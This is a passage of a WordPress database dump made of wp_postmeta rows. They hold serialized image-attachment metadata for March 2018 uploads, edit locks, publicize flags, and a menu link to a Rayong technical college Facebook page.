(5559, 1830, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:237;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-27-29.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-27-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5560, 1831, '_wp_attached_file', '2018/03/14-3-2561-13-25-14.jpg'),
(5561, 1831, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:578;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-25-14.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-25-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-3-2561-13-25-14-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-25-14-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5562, 1832, '_wp_attached_file', '2018/03/14-3-2561-13-34-37.jpg'),
(5563, 1832, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:433;s:6:\"height\";i:312;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-34-37.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-34-37-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-34-37-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-34-37-400x288.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5564, 1833, '_wp_attached_file', '2018/03/14-3-2561-13-38-35.jpg'),
(5565, 1833, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-38-35.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-38-35-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5566, 1834, '_wp_attached_file', '2018/03/14-3-2561-13-35-45.jpg'),
(5567, 1834, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:586;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-35-45.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-35-45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"14-3-2561-13-35-45-300x81.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:81;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-35-45-400x108.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:108;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5568, 1835, '_wp_attached_file', '2018/03/14-3-2561-13-40-22.jpg'),
(5569, 1835, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:256;s:6:\"height\";i:321;s:4:\"file\";s:30:\"2018/03/14-3-2561-13-40-22.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-40-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-40-22-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"14-3-2561-13-40-22-239x300.jpg\";s:5:\"width\";i:239;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5570, 1838, '_edit_lock', '1525616452:4'),
(5571, 1838, '_edit_last', '3'),
(5572, 1838, '_publicize_pending', '1'),
(5573, 1838, '_hide_featured', NULL),
(5574, 1840, '_edit_lock', '1521010799:3'),
(5575, 1840, '_edit_last', '3'),
(5576, 1840, '_publicize_pending', '1'),
(5577, 1840, '_hide_featured', NULL),
(5578, 1842, '_edit_lock', '1521010862:3'),
(5579, 1842, '_edit_last', '3'),
(5580, 1842, '_publicize_pending', '1'),
(5581, 1842, '_hide_featured', NULL),
(5582, 1844, '_edit_lock', '1523520266:4'),
(5583, 1844, '_edit_last', '3'),
(5584, 1844, '_publicize_pending', '1'),
(5585, 1844, '_hide_featured', NULL),
(5586, 1846, '_edit_lock', '1521011365:3'),
(5587, 1846, '_edit_last', '3'),
(5588, 1846, '_publicize_pending', '1'),
(5589, 1846, '_hide_featured', NULL),
(5590, 1848, '_edit_lock', '1624864877:14'),
(5591, 1848, '_edit_last', '14'),
(5601, 1850, '_menu_item_type', 'custom'),
(5602, 1850, '_menu_item_menu_item_parent', '0'),
(5603, 1850, '_menu_item_object_id', '1850'),
(5604, 1850, '_menu_item_object', 'custom'),
(5605, 1850, '_menu_item_target', ''),
(5606, 1850, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(5607, 1850, '_menu_item_xfn', ''),
(5608, 1850, '_menu_item_url', 'https://www.facebook.com/RayongTC/'),
(5610, 1850, '_publicize_pending', '1'),
(5611, 1851, '_edit_lock', '1521099709:3'),
(5612, 1852, '_wp_attached_file', '2018/03/29176888_555862101456649_7016365966107869184_o.jpg'),
(5613, 1852, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/03/29176888_555862101456649_7016365966107869184_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"29176888_555862101456649_7016365966107869184_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"29176888_555862101456649_7016365966107869184_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"29176888_555862101456649_7016365966107869184_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"29176888_555862101456649_7016365966107869184_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"29176888_555862101456649_7016365966107869184_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5614, 1851, '_edit_last', '3'),
(5618, 1851, '_hide_featured', NULL),
(5619, 1851, '_wpas_done_all', '1'),
(5624, 1851, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575629521;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4265;}i:1;a:1:{s:2:\"id\";i:6308;}i:2;a:1:{s:2:\"id\";i:6054;}}}}'),
(5633, 1851, '_thumbnail_id', '1852'),
(5638, 1861, '_edit_lock', '1521087724:3'),
(5639, 1861, '_edit_last', '3'),
(5640, 1862, '_wp_attached_file', '2018/03/27709438_540048929704633_7021054357732909465_o.jpg'),
(5641, 1862, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1152;s:4:\"file\";s:58:\"2018/03/27709438_540048929704633_7021054357732909465_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27709438_540048929704633_7021054357732909465_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27709438_540048929704633_7021054357732909465_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27709438_540048929704633_7021054357732909465_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27709438_540048929704633_7021054357732909465_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27709438_540048929704633_7021054357732909465_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5642, 1861, '_thumbnail_id', '1862'),
(5646, 1861, '_hide_featured', NULL),
(5647, 1861, '_wpas_done_all', '1'),
(5652, 1864, '_edit_lock', '1521089358:3'),
(5653, 1864, '_edit_last', '3'),
(5654, 1865, '_wp_attached_file', '2018/03/27798250_542868072756052_5701808612592798726_o.jpg'),
(5655, 1865, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27798250_542868072756052_5701808612592798726_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27798250_542868072756052_5701808612592798726_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27798250_542868072756052_5701808612592798726_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27798250_542868072756052_5701808612592798726_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27798250_542868072756052_5701808612592798726_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27798250_542868072756052_5701808612592798726_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5656, 1866, '_wp_attached_file', '2018/03/27908140_542857359423790_4485720651593021534_o.jpg'),
(5657, 1866, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27908140_542857359423790_4485720651593021534_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27908140_542857359423790_4485720651593021534_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27908140_542857359423790_4485720651593021534_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27908140_542857359423790_4485720651593021534_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27908140_542857359423790_4485720651593021534_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27908140_542857359423790_4485720651593021534_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5658, 1867, '_wp_attached_file', '2018/03/27913083_542857439423782_6534194945684348090_o.jpg'),
(5659, 1867, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27913083_542857439423782_6534194945684348090_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27913083_542857439423782_6534194945684348090_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27913083_542857439423782_6534194945684348090_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27913083_542857439423782_6534194945684348090_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27913083_542857439423782_6534194945684348090_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27913083_542857439423782_6534194945684348090_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5660, 1868, '_wp_attached_file', '2018/03/27983492_542861462756713_1646595961752838640_o.jpg'),
(5661, 1868, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27983492_542861462756713_1646595961752838640_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27983492_542861462756713_1646595961752838640_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27983492_542861462756713_1646595961752838640_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27983492_542861462756713_1646595961752838640_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27983492_542861462756713_1646595961752838640_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27983492_542861462756713_1646595961752838640_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5662, 1869, '_wp_attached_file', '2018/03/28060918_542865276089665_5592000227523744419_o.jpg'),
(5663, 1869, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28060918_542865276089665_5592000227523744419_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28060918_542865276089665_5592000227523744419_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28060918_542865276089665_5592000227523744419_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28060918_542865276089665_5592000227523744419_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28060918_542865276089665_5592000227523744419_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28060918_542865276089665_5592000227523744419_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5664, 1870, '_wp_attached_file', '2018/03/28060953_542857416090451_6553955049161507666_o.jpg'),
(5665, 1870, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28060953_542857416090451_6553955049161507666_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28060953_542857416090451_6553955049161507666_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28060953_542857416090451_6553955049161507666_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28060953_542857416090451_6553955049161507666_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28060953_542857416090451_6553955049161507666_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28060953_542857416090451_6553955049161507666_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5666, 1871, '_wp_attached_file', '2018/03/28070743_542857386090454_9058964697292876716_o.jpg'),
(5667, 1871, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/28070743_542857386090454_9058964697292876716_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"28070743_542857386090454_9058964697292876716_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"28070743_542857386090454_9058964697292876716_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"28070743_542857386090454_9058964697292876716_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"28070743_542857386090454_9058964697292876716_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"28070743_542857386090454_9058964697292876716_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5668, 1872, '_wp_attached_file', '2018/03/27797953_542867632756096_5061141651436011357_o.jpg'),
(5669, 1872, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/03/27797953_542867632756096_5061141651436011357_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"27797953_542867632756096_5061141651436011357_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"27797953_542867632756096_5061141651436011357_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"27797953_542867632756096_5061141651436011357_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"27797953_542867632756096_5061141651436011357_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"27797953_542867632756096_5061141651436011357_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\